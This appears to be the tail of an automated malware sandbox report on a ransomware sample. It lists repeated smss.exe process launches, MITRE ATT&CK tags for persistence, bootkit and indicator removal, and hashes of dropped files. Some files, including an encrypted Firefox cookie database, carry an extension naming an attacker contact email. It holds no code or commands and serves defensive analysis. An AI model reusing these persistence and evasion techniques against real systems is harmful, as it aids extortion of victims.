C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 0000014c 000000801⤵PID:4928
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000130 000000801⤵PID:3192
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000178 000000801⤵PID:4716
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000140 000000801⤵PID:4940
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000178 000000801⤵PID:4840
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000001d0 000000801⤵PID:1428
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000104 000000801⤵PID:544
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000178 000000801⤵PID:1504
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000001ec 000000801⤵PID:592
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000d8 000000801⤵PID:872
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Pre-OS Boot
1Bootkit
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Defense Evasion
Impair Defenses
1Indicator Removal
3File Deletion
3Modify Registry
1Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll.id[F3547DDF-3483].[[email protected]].8base
Filesize3.2MB
MD5b9a1997740e1cce53946851bba684936
SHA196dc47ec72328bb5601ecf50ffdbfe46a136dce6
SHA256c644c841140dfddd2caebb23899cdaed419620ffcf92f1d49176e859505495d7
SHA512f6417288265fdb5bc7e10eb42859bb0a25da728725d4e347cfc67fe504fa3806cf0a6f04f670afb03ec41298865cc251a74ee2039fff434c83897c8bcfe6d14e
-
Filesize
3KB
MD5573d77d4e77a445f5db769812a0be865
SHA17473d15ef2d3c6894edefd472f411c8e3209a99c
SHA2565ec3f268845a50e309ae0d80bcee4f4dd4cd1b279ab1e64b523a057c11074f1c
SHA512af2422a9790a91cdcbe39e6ef6d17899c2cbd4159b1b71ac56f633015068d3afc678fcef34892575bf59bdf7d5914ec6070864940d44130263fe84e28abba2dc
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe.log
Filesize927B
MD5ffe7bf10728fcdc9cfc28d6c2320a6f8
SHA1af407275e9830d40889da2e672d2e6af118c8cb8
SHA25672653cc5191f40cf26bcabcb5e0e41e53f23463f725007f74da78e36f9ec1522
SHA512766753516d36ef1065d29dd982e0b6ee4e84c0c17eb2b0a6ca056f6c8e2a908e53c169bbcb01ab8b9ba1be1463fdd4007398d964aed59de761c1a6213842776c
-
Filesize
927B
MD5ffe7bf10728fcdc9cfc28d6c2320a6f8
SHA1af407275e9830d40889da2e672d2e6af118c8cb8
SHA25672653cc5191f40cf26bcabcb5e0e41e53f23463f725007f74da78e36f9ec1522
SHA512766753516d36ef1065d29dd982e0b6ee4e84c0c17eb2b0a6ca056f6c8e2a908e53c169bbcb01ab8b9ba1be1463fdd4007398d964aed59de761c1a6213842776c
-
Filesize
927B
MD5ffe7bf10728fcdc9cfc28d6c2320a6f8
SHA1af407275e9830d40889da2e672d2e6af118c8cb8
SHA25672653cc5191f40cf26bcabcb5e0e41e53f23463f725007f74da78e36f9ec1522
SHA512766753516d36ef1065d29dd982e0b6ee4e84c0c17eb2b0a6ca056f6c8e2a908e53c169bbcb01ab8b9ba1be1463fdd4007398d964aed59de761c1a6213842776c
-
Filesize
927B
MD5ffe7bf10728fcdc9cfc28d6c2320a6f8
SHA1af407275e9830d40889da2e672d2e6af118c8cb8
SHA25672653cc5191f40cf26bcabcb5e0e41e53f23463f725007f74da78e36f9ec1522
SHA512766753516d36ef1065d29dd982e0b6ee4e84c0c17eb2b0a6ca056f6c8e2a908e53c169bbcb01ab8b9ba1be1463fdd4007398d964aed59de761c1a6213842776c
-
Filesize
985B
MD55c7267776f35240c1b20006557297ccd
SHA18e8b9b521fad9bca1e8522c396d2378d67592baf
SHA25609d83a01bddf76617d9469745aa5c456164542edd558f381f4917d083b6d44ac
SHA51230500f8ebd7d8a76929446da58a0b91be436dbd560b288ee09c67b25558beb6df762074143f27d82f51c542e7d653b187ef5f2d30436ebfc2e4e265ee62be9b8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001c.db.id[F3547DDF-3483].[[email protected]].8base
Filesize93KB
MD584f11be98f8b899e2e7cd6e39d97a3fe
SHA1a9fb89c2f400211a27d0a3c438b7098d6b2f0f98
SHA25623bbc8d08582d94b12fe9246838c5558ff3c9ba819582cc23db7b77f6e47c9c5
SHA5127fdc2f85c50429dc08a23bec55082bc24262786e6dc49ad91a9ed7f8d0af045386d9a042326bce3682dcc38de2ed9ac1fdc165cab5a8774ec8e8da268ca3b312
-
Filesize
1KB
MD5631f4b3792b263fdda6b265e93be4747
SHA11d6916097d419198bfdf78530d59d0d9f3e12d45
SHA2564e68d2d067c5680a2e55853ac58b16f199b09f1b9e5f2174605fff18da828976
SHA512e0280041c4ca63971ab2524f25d2047820f031c1b4aeb6021a3367297045ddf6616ffccafb54630eb07fd154571d844329ebcc34d6ce64834cb77cba373e4fbe
-
Filesize
628KB
MD5cb0f99306d05042b8b3db064ac3489b9
SHA11a5e8b4435f97dfd09b764c82dba35868e792803
SHA25671bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9
SHA512fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41
-
Filesize
628KB
MD5cb0f99306d05042b8b3db064ac3489b9
SHA11a5e8b4435f97dfd09b764c82dba35868e792803
SHA25671bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9
SHA512fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41
-
Filesize
628KB
MD5cb0f99306d05042b8b3db064ac3489b9
SHA11a5e8b4435f97dfd09b764c82dba35868e792803
SHA25671bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9
SHA512fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41
-
Filesize
628KB
MD5cb0f99306d05042b8b3db064ac3489b9
SHA11a5e8b4435f97dfd09b764c82dba35868e792803
SHA25671bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9
SHA512fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41
-
Filesize
628KB
MD5cb0f99306d05042b8b3db064ac3489b9
SHA11a5e8b4435f97dfd09b764c82dba35868e792803
SHA25671bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9
SHA512fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41
-
Filesize
618KB
MD53f6d5376b6d40c82644287c7621dfc5b
SHA1f54b9ed42b60eb6793cd55ed25e6f2bd6120218f
SHA25694dbf6089ceccafd34ec1011941f18682361d71a9fbc54d1495dc0f9ec52169e
SHA5123ea3e7c045c015e8c455ed9f550784d7af75c2cba263913ffaa210652f74ed036a6541b71f95d11663ee6dd062059cbcad94c1148243852d01722dd8780d010c
-
Filesize
618KB
MD53f6d5376b6d40c82644287c7621dfc5b
SHA1f54b9ed42b60eb6793cd55ed25e6f2bd6120218f
SHA25694dbf6089ceccafd34ec1011941f18682361d71a9fbc54d1495dc0f9ec52169e
SHA5123ea3e7c045c015e8c455ed9f550784d7af75c2cba263913ffaa210652f74ed036a6541b71f95d11663ee6dd062059cbcad94c1148243852d01722dd8780d010c
-
Filesize
618KB
MD53f6d5376b6d40c82644287c7621dfc5b
SHA1f54b9ed42b60eb6793cd55ed25e6f2bd6120218f
SHA25694dbf6089ceccafd34ec1011941f18682361d71a9fbc54d1495dc0f9ec52169e
SHA5123ea3e7c045c015e8c455ed9f550784d7af75c2cba263913ffaa210652f74ed036a6541b71f95d11663ee6dd062059cbcad94c1148243852d01722dd8780d010c
-
Filesize
902KB
MD5480a66902e6e7cdafaa6711e8697ff8c
SHA16ac730962e7c1dba9e2ecc5733a506544f3c8d11
SHA2567eaaaa6010bbcd6bb8c9ad08d4b0966c7aedc9b2ac24758f170012ac36e508b5
SHA5127d010cd47b7d1adf66f9c97afc6c3805997aa5c7cc6ff13eddee81f24cf2b95a3fe375ec5b3d6185c0bc8840b4ad91ae143c73a39af26391cc182ab6a1793ba5
-
Filesize
46B
MD53f05819f995b4dafa1b5d55ce8d1f411
SHA1404449b79a16bfc4f64f2fd55cd73d5d27a85d71
SHA2567e0bf0cbd06a087500a9c3b50254df3a8a2c2980921ab6a62ab1121941c80fc0
SHA51234abb7df8b3a68e1649ff0d2762576a4d4e65da548e74b1aa65c2b82c1b89f90d053ecddac67c614ca6084dc5b2cb552949250fb70f49b536f1bcb0057717026
-
Filesize
798KB
MD590aadf2247149996ae443e2c82af3730
SHA1050b7eba825412b24e3f02d76d7da5ae97e10502
SHA256ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a
SHA512eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be
-
Filesize
798KB
MD590aadf2247149996ae443e2c82af3730
SHA1050b7eba825412b24e3f02d76d7da5ae97e10502
SHA256ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a
SHA512eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be
-
Filesize
628KB
MD5cb0f99306d05042b8b3db064ac3489b9
SHA11a5e8b4435f97dfd09b764c82dba35868e792803
SHA25671bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9
SHA512fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41
-
Filesize
628KB
MD5cb0f99306d05042b8b3db064ac3489b9
SHA11a5e8b4435f97dfd09b764c82dba35868e792803
SHA25671bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9
SHA512fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41
-
Filesize
628KB
MD5cb0f99306d05042b8b3db064ac3489b9
SHA11a5e8b4435f97dfd09b764c82dba35868e792803
SHA25671bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9
SHA512fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41
-
Filesize
628KB
MD5cb0f99306d05042b8b3db064ac3489b9
SHA11a5e8b4435f97dfd09b764c82dba35868e792803
SHA25671bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9
SHA512fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41
-
Filesize
628KB
MD5cb0f99306d05042b8b3db064ac3489b9
SHA11a5e8b4435f97dfd09b764c82dba35868e792803
SHA25671bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9
SHA512fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41
-
Filesize
576KB
MD58be029b88548450edb5e6b65a60cbfc9
SHA159d11404e51389f8bbadbd32cfdc574834fa1be4
SHA2568f703dbe94ad3c9bfee41a6b920cd7765f0a948cae9bdf196b080253411a5d23
SHA5127fadf75177261266ba0e5a24564bbbb0edbe5daaecd45ba022f9dbf11a7b86564b48782ba0a62a5462fccd1b5f7c084133f371a3480f55611a91740483977fb0
-
Filesize
576KB
MD58be029b88548450edb5e6b65a60cbfc9
SHA159d11404e51389f8bbadbd32cfdc574834fa1be4
SHA2568f703dbe94ad3c9bfee41a6b920cd7765f0a948cae9bdf196b080253411a5d23
SHA5127fadf75177261266ba0e5a24564bbbb0edbe5daaecd45ba022f9dbf11a7b86564b48782ba0a62a5462fccd1b5f7c084133f371a3480f55611a91740483977fb0
-
Filesize
576KB
MD58be029b88548450edb5e6b65a60cbfc9
SHA159d11404e51389f8bbadbd32cfdc574834fa1be4
SHA2568f703dbe94ad3c9bfee41a6b920cd7765f0a948cae9bdf196b080253411a5d23
SHA5127fadf75177261266ba0e5a24564bbbb0edbe5daaecd45ba022f9dbf11a7b86564b48782ba0a62a5462fccd1b5f7c084133f371a3480f55611a91740483977fb0
-
Filesize
298KB
MD5966f6925f2e2ea12f260ad305d5bfc69
SHA1baeadfda934497ddc676a78e886935e4a70ce214
SHA2560bae6a5e4eb4347a99a45dcc9bec3d11da7f3f3e1743e3533c83cf9154b5d635
SHA5129fadab42dabc13b3e65ef99e4a5feaa8af18c09fec710409091a8aeb48d3f1e8462c31cdca553eb584f1a1475506645cf52f510bd624197a5a9e742afab0ce74
-
Filesize
298KB
MD5966f6925f2e2ea12f260ad305d5bfc69
SHA1baeadfda934497ddc676a78e886935e4a70ce214
SHA2560bae6a5e4eb4347a99a45dcc9bec3d11da7f3f3e1743e3533c83cf9154b5d635
SHA5129fadab42dabc13b3e65ef99e4a5feaa8af18c09fec710409091a8aeb48d3f1e8462c31cdca553eb584f1a1475506645cf52f510bd624197a5a9e742afab0ce74
-
Filesize
9.9MB
MD54c328b215a84c1b2c982a3268b4a0cea
SHA1addaaa78ce3f457d008a4958b2c1a404dcc62eaa
SHA2563761032e760a2bcc61854a0c7cf22e8e991af0ed60fac92b981853eadda00d1a
SHA512bd1a0bb98487781d8a6a5145e30544112d511c4510eda59150f23ff605db4ded5f42869a5be9ff0ff7fc570ab2d9f05c13223f3a420a7fa3b3ad7258f2084598
-
Filesize
9.9MB
MD54c328b215a84c1b2c982a3268b4a0cea
SHA1addaaa78ce3f457d008a4958b2c1a404dcc62eaa
SHA2563761032e760a2bcc61854a0c7cf22e8e991af0ed60fac92b981853eadda00d1a
SHA512bd1a0bb98487781d8a6a5145e30544112d511c4510eda59150f23ff605db4ded5f42869a5be9ff0ff7fc570ab2d9f05c13223f3a420a7fa3b3ad7258f2084598
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
18KB
MD5994669c5737b25c26642c94180e92fa2
SHA1d8a1836914a446b0e06881ce1be8631554adafde
SHA256bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c
SHA512d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ncyvcqak.default-release\cookies.sqlite.id[F3547DDF-3483].[[email protected]].8base
Filesize96KB
MD52cb4069626dd85a08c0fd4ecb1ea6c2a
SHA18340bdf29bcc30ec1b1b6598411f7e07f2cabd70
SHA256ca1b4dc4f90c924f5afc7008c4d48b2838f4ca13b6912c86ee429339d4823163
SHA512e91b2226809046a9ea08fe711ab9550e3f06e15841cbea47e23c3223172b3b6cc0273a82f470a5650e8e078b9bd05429d25d2d2d6bbd46cfc590d6fda0d24a45
-
Filesize
618KB
MD53f6d5376b6d40c82644287c7621dfc5b
SHA1f54b9ed42b60eb6793cd55ed25e6f2bd6120218f
SHA25694dbf6089ceccafd34ec1011941f18682361d71a9fbc54d1495dc0f9ec52169e
SHA5123ea3e7c045c015e8c455ed9f550784d7af75c2cba263913ffaa210652f74ed036a6541b71f95d11663ee6dd062059cbcad94c1148243852d01722dd8780d010c
-
Filesize
438KB
MD57a6269975267078cc27f4e60b142516d
SHA1092a05fab1f67847a91e4f4b320fb879206f9d57
SHA256862c1c57bfdc6f30b88646ae35029427f91512fd5cf354d05a8339b8d94ff96c
SHA51234abb6a7f904590e303c1431e68af7bd76f4a962ee41f145c432525631668754d1119665b8134495bccd453584c6b93bd521c29f0f15f069104f39607c178d05
-
Filesize
5KB
MD55687f4c824f55f30d8986252374dcdf3
SHA179a57cf8290bedc80454503f4d0dc99c4605aab8
SHA25674edefbae6d291bb440c9f42fc5410f630ecb7511e3d96db3bf44651d5c5b0af
SHA5121b9cd876fb34281678b465606f6a0cd9d1b72312576f239f2c7639a41816c0258147fcdcccd988e8957052bed1ad050bae083dc4e1d04669703643ce3859a447
-
Filesize
5KB
MD55687f4c824f55f30d8986252374dcdf3
SHA179a57cf8290bedc80454503f4d0dc99c4605aab8
SHA25674edefbae6d291bb440c9f42fc5410f630ecb7511e3d96db3bf44651d5c5b0af
SHA5121b9cd876fb34281678b465606f6a0cd9d1b72312576f239f2c7639a41816c0258147fcdcccd988e8957052bed1ad050bae083dc4e1d04669703643ce3859a447
-
Filesize
5KB
MD55687f4c824f55f30d8986252374dcdf3
SHA179a57cf8290bedc80454503f4d0dc99c4605aab8
SHA25674edefbae6d291bb440c9f42fc5410f630ecb7511e3d96db3bf44651d5c5b0af
SHA5121b9cd876fb34281678b465606f6a0cd9d1b72312576f239f2c7639a41816c0258147fcdcccd988e8957052bed1ad050bae083dc4e1d04669703643ce3859a447
-
Filesize
5KB
MD55687f4c824f55f30d8986252374dcdf3
SHA179a57cf8290bedc80454503f4d0dc99c4605aab8
SHA25674edefbae6d291bb440c9f42fc5410f630ecb7511e3d96db3bf44651d5c5b0af
SHA5121b9cd876fb34281678b465606f6a0cd9d1b72312576f239f2c7639a41816c0258147fcdcccd988e8957052bed1ad050bae083dc4e1d04669703643ce3859a447
-
Filesize
5KB
MD55687f4c824f55f30d8986252374dcdf3
SHA179a57cf8290bedc80454503f4d0dc99c4605aab8
SHA25674edefbae6d291bb440c9f42fc5410f630ecb7511e3d96db3bf44651d5c5b0af
SHA5121b9cd876fb34281678b465606f6a0cd9d1b72312576f239f2c7639a41816c0258147fcdcccd988e8957052bed1ad050bae083dc4e1d04669703643ce3859a447
-
Filesize
902KB
MD5480a66902e6e7cdafaa6711e8697ff8c
SHA16ac730962e7c1dba9e2ecc5733a506544f3c8d11
SHA2567eaaaa6010bbcd6bb8c9ad08d4b0966c7aedc9b2ac24758f170012ac36e508b5
SHA5127d010cd47b7d1adf66f9c97afc6c3805997aa5c7cc6ff13eddee81f24cf2b95a3fe375ec5b3d6185c0bc8840b4ad91ae143c73a39af26391cc182ab6a1793ba5
-
Filesize
18KB
MD5994669c5737b25c26642c94180e92fa2
SHA1d8a1836914a446b0e06881ce1be8631554adafde
SHA256bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c
SHA512d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563